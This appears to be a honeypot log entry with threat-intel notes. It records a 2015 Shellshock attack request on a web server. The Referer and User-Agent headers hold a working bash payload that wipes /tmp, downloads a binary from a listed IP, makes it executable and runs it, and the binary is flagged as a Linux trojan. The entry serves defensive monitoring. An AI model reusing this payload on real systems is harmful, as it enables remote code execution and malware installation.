BEGIN OF HTTP DATA:
2015-09-30 11:05:18
Source IP: 61.161.130.241
Country: CN RiskScore: 1 Malware: []
GET / HTTP/1.1
Host: 109.234.106.8
Referer: () { :; }; /bin/bash -c "rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-tnci >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-tnci >> /tmp/Run.sh;echo /tmp/China.Z-tnci >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh"
Accept:*/*
User-Agent: () { :; }; /bin/bash -c "rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-tnci >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-tnci >> /tmp/Run.sh;echo /tmp/China.Z-tnci >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh"
Connection:Keep-Alive
I did not think I would see that again :-)
java: Linux.Trojan.Agent FOUND
61.161.130[.]241
Static Source: GeoIP data
- Country: China
- ASN: AS4837 CNCGROUP China169 Backbone
Dynamic Source: SANS Internet Storm Cast
- comment:IP is listed on SANS ISC
- comment:This entry alone does not indicate a threat, please check the link
- Reference: https://isc.sans.edu/api/ip/61.161.130.241
61.160.212[.]172
Static Source: GeoIP data
- Country: China
- ASN: AS23650 AS Number for CHINANET jiangsu province backbone
Dynamic Source: SANS Internet Storm Cast
- comment:IP is listed on SANS ISC
- comment:This entry alone does not indicate a threat, please check the link
- Reference: https://isc.sans.edu/api/ip/61.160.212.172